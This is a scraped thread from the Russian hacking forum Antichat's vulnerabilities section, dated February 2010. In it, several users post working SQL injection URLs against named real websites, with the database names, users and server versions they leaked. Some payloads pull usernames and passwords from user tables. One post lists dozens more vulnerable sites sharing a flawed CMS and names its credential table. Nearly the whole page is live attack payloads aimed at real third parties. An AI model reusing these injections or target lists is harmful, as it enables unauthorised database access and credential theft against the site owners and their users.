ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11491  
Старый 17.02.2010, 00:30
Аватар для SEWERN
SEWERN
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612

Репутация: 94
По умолчанию

както уныло скулится ((

Код:
http://www.dedicatedservers2.com.ar/classifiedads/classifiedads.html?id=5898+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.tables--
version : 5.0.89-community
user:sellbuy1_blox@localhost
 
Ответить с цитированием

  #11492  
Старый 17.02.2010, 01:26
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
http://www.bournemouthcc.co.uk/main/table.php?id=-1+UNION+SELECT+1--
user: bourne2_admin@localhost
version: 5.0.81-community
database: bourne2_website
 
Ответить с цитированием

  #11493  
Старый 17.02.2010, 02:22
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
http://www.jvc.fr/knowledge-list.php?id=-1+union+select+null,version(),null,null+--+
version: PostgreSQL 8.3.7 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
 
Ответить с цитированием

  #11494  
Старый 17.02.2010, 15:28
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

ах эта свадьба, свадьба .......
Цитата:
http://bgwedding.com/index.php?page=s_62222222+union+select+1,username, password+from+users--+
version: 5+

rz1307
 
Ответить с цитированием

  #11495  
Старый 17.02.2010, 16:21
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Нашёл одну контору, которая занимается дизайном и разработкой сайтов, и, естестенно:
Код:
http://www.cycling.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a)
database: cyclingby
user: cyclingby@localhost
version: 5.0.51a-24+lenny2+spu1

Код:
http://www.gelatin.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a)
database: gelatinby
user: gelatinby@localhost
version: 5.0.51a-24+lenny2+spu1

Код:
http://www.gelatin.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a)
database: gelatinby
user: gelatinby@localhost
version: 5.0.51a-24+lenny2+spu1

Код:
http://www.nissan-belarus.by/page.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a)
database: nissanbelarusby
user: nissanbelarusby@localhost
version: 5.0.51a-24+lenny2+spu1

Код:
http://www.zaym.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a)
database: zaymby
user: zaymby@localhost
version: 5.0.51a-24+lenny2+spu1

Код:
http://www.omkk.by/page.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a)
database: omkkby
user: omkkby@localhost
version: 5.0.51a-24+lenny2+spu1

Код:
http://www.skpf.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a)
database: skpfby
user: skpfby@localhost
version: 5.0.51a-24+lenny2+spu1

Интересующая таблица: cms_system_users
колонки: login, password
На всех сайтах!!!
 
Ответить с цитированием

  #11496  
Старый 17.02.2010, 17:47
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

file-priv =y
user:root
version: 4.....

Цитата:
http://dunmansec.egenie.org/notice/view_one_pop.php?notice_ID=-217+union+select+1,config_name,config_value,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+php bb_config+limit+57,1/*
 
Ответить с цитированием

  #11497  
Старый 17.02.2010, 18:10
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

И ещё:
http://www.ruralbelarus.by/menu.php?form_id=
http://zaym.by/menu.php?form_id=
http://www.milkpolys.by/menu.php?form_id=
http://www.narochbereg.by/
http://www.web-energo.by/firm.php?form_id=
http://www.narochbereg.by/menu.php?form_id=
http://www.avmir.by/product.php?form_id=
http://www.sovartus.by/menu.php?form_id=
http://www.vint.by/menu.php?form_id=
http://www.bkpp.by/menu.php?form_id=
http://www.tehnoviza.by/menu.php?form_id=
http://jurexpress.by/menu.php?form_id=
http://www.diapal.by/menu.php?form_id=
http://buzil.by/page.php?form_id=
http://www.hefter.by/menu.php?form_id=
http://www.mila-style.by/page.php?form_id=
http://www.amtechreklama.by/menu.php?form_id=
http://zub.by/menu.php?form_id=
http://www.iti.by/menu.php?form_id=
http://www.prishcepka.by/menu.php?form_id=
http://www.bva.by/menu.php?form_id=
http://cagia.by/menu.php?form_id=
http://britex.by/menu.php?form_id=
http://www.belmoris.by/news.php?form_id=
http://www.filterbel.by/menu.php?form_id=
http://ivushka.by/menu.php?form_id=
http://www.oknastyl.by/page.php?form_id=
http://gorksm.by/menu.php?form_id=
http://my-dom.by/menu.php?form_id=
http://www.dudutky.by/menu.php?form_id=
http://www.hefter.by/menu.php?form_id=
http://www.tehnoviza.by/menu.php?form_id=

На всех скуля)



Код:
http://elekt.vitebsk.by/menu.php?form_id=-1+union+select+1,2,version()+--+
database: elektvitebskby
user: elektvitebskby@localhost
version: 5.0.51a-24+lenny2+spu1

Код:
http://www.agrosemproduct.by/page.php?form_id=-1+union+select+1,group_concat(user(),0x3a,version(),0x3a,database()),3,4+--+
agrosemproductby@localhost:5.0.51a-24+lenny2+spu1:agrosemproductby

Код:
http://www.belproduct.com/page.php?form_id=-1+union+select+1,group_concat(user(),0x3a,version(),0x3a,database()),3,4+--+
belproductcom@localhost:5.1.34-community-log:belprod_php


Код:
http://www.transelektrokomplekt.by/page.php?form_id=-1+union+select+1,group_concat(user(),0x3a,version(),0x3a,database()),3,4+--+
transelektrokomp@localhost:5.0.51a-24+lenny2+spu1:transelektrokomp

Код:
http://www.milena.by/menu.php?form_id=-1+union+select+1,2,group_concat(user(),0x3a,version(),0x3a,database()),4+--+
milenaby@localhost:5.0.51a-24+lenny2+spu1:milenaby
 
Ответить с цитированием

  #11498  
Старый 17.02.2010, 22:55
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Новая пачка инъекций=)

Улыбнуло то, что когда написал idsub=-1 открылась страница с надписью "Hazker?"
Код:
http://kip.medaar.ru/prod.php?idsub=105+and+1=2+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
database: medaarr_kip
user: medaarr_evg@217.147.30.150
version: 4.1.22-standard-log

Код:
http://www.newtoys.ru/form_work/?id_form=-1+union+select+1,2,3,4,5+--+
database: newtoysr_main
version: 4.0.27-log
user: newtoysr_main@localhost

Код:
http://www.krim24.org.ua/index.php?comm=form&id_form=-1+union+select+1,2,3,4,group_concat(database(),0x3a,user(),0x3a,version())+--+&text_ID=200&top_i_n=5
database: togoz212_krim24
user: togoz212@localhost
version: 5.0.89-community-log

Код:
http://www.feedex.ru/form_work/?id_form=-1+union+select+1,2,user(),4,5+--+
database: feedexru_base
user: feedexru_bear@localhost
version: 4.0.27-log

Код:
http://www.vamnadom.ru/index.php?num=-1+union+select+1,group_concat(database(),0x3a,user(),0x3a,version()),3,4,5+--+
database: vamnadom_mains
user: vamnadom_bear102@localhost
version: 5.0.77-log

Код:
http://www.inetrostov.ru/main/?fln=-1+union+select+1,2,group_concat(database(),0x3a,user(),0x3a,version()),4+--+
database: inetrost_mnir
user: inetrost_mnbr@localhost
version: 5.0.77-log
 
Ответить с цитированием

  #11499  
Старый 18.02.2010, 00:39
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
http://fature.net/release.php?id=-1+union+select+1,2,group_concat(database(),0x3a,user(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
database: fature_net
version: 5.0.32-Debian_7etch11-log
user: fature_net@srv117.one.com

Код:
http://www.wiebetech.com/pressreleases/release.php?id=-1+union+select+1,2,3,4,group_concat(database(),0x3a,user(),0x3a,version()),6,7,8,9,10,11,12,13,14,15,16+--+
database: webphp
version: 4.1.22
user: webphp@localhost

Код:
http://www.webbyawards.com/press/press-release.php?id=-1+union+select+1,2,3,4,5+--+
database: webby_01
version: 5.0.45
user: rodger@localhost
 
Ответить с цитированием

  #11500  
Старый 18.02.2010, 04:35
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

устал(((((

Код:
http://guernseyhobbysupplies.com/shop.php?moreinfo=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),

4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+
version: 5.0.89-COMMUNITY
database: WEB35-VMM
user: WEB35-VMM@LOCALHOST

Код:
http://www.vanzintruckaccessories.com/shop.php?product=-1+union+select+1,2,3,4,concat(database(),0x3a,user(),0x3a,ver

sion()),6,7,8,9,10,11,12,13,14,15,16,17+--+&category=
version: 5.0.67-community-nt
database: vanzin
user: vanzin@localhost

Код:
http://ism.ie/shop.php?page=category&action=view&category_id=-1+union+select+1,concat(database(),0x3a,user(),0x3a,ver

sion()),3,4,5,6,7,8,9,10,11,12,13+--+
version: 5.0.45-community-nt
database: ism09
user: ism_admin@localhost

Код:
http://www.hotcan.com/shop.php?product=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),4,5,6,7,8+--

+
version: 5.1.34-community
database: hotcan
user: hotcan@localhost

Код:
http://eminenceonline.com/site/shop.php?pID=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),4,5,6,7

,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
version: 5.0.45
database: eminence_cmsDB
user: eminence_cms@localhost

Blind
Код:
http://www.thewcp.co.uk/shop.php?CatID=176+and+substring(version(),1,1)=4

Код:
http://www.nabatorganic.com/store.php?id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(user(),14)a)+as+t+JOIN+(SELEC

T+NAME_CONST(user(),14)a)a)a)&cat_id=13&expanddiv=13
version: 5.0.51a-3ubuntu5.4
database: nabat
user: nabat@localhost

Код:
http://www.toprxsavings.com/store/src/store.php?prog=products&a=preview&id=-1+union+select+1,concat(database(),0x3a,u

ser(),0x3a,version()),3,4,5,6,7,8,9,10,11+--+&cat=117&in_template=1&nocache=MXR1250434392QGBGAS2009/08161250434392&id

ioma=ENG
version: 4.1.22-standard
database: savings_tienda
user: savings_4dm1n@localhost

Код:
http://www.oldgaspump.com/store.php?section=1&catid=340&id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(user(),14)a

)+as+t+JOIN+(SELECT+NAME_CONST(user(),14)a)a)a)
version: 5.0.51a-3ubuntu5.5
database: vicsplace
user: vicsplace@localhost

Код:
http://www.myesterna.com/store.php?action=showsubcat&id=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,versio

n()),4+--+
version: 4.1.22-max-log
database: myestdb
user: myestdb@208.109.181.40

Код:
http://www.bidstant.com/store.php?id=-1+union+select+1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6,7,8,9,10

,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+--+
version: 5.0.67-community
database: bidstantauc
user: adminbid@localhost

Код:
http://www.houstonbluessociety.org/store.php?Id=-1+union+select+1,2,3,4,5,6,7,8,unhex(hex(database()))+--+
version: 4.1.16
database: houstonbs
user: admin@localhost

В конце исходного кода:
Код:
http://www.pbmperformance.com/store.php?catId=-1+union+select+user(),2,3,4,5,6+--+&parent=-1
version: 4.1.22-standard
database: pbmerson_main
user: pbmerson_admin@localhost

Код:
http://www.shangrila-plaza.com/store.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+--+
version: 5.0.45
database: shangrilamall
user: shangrilamall@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ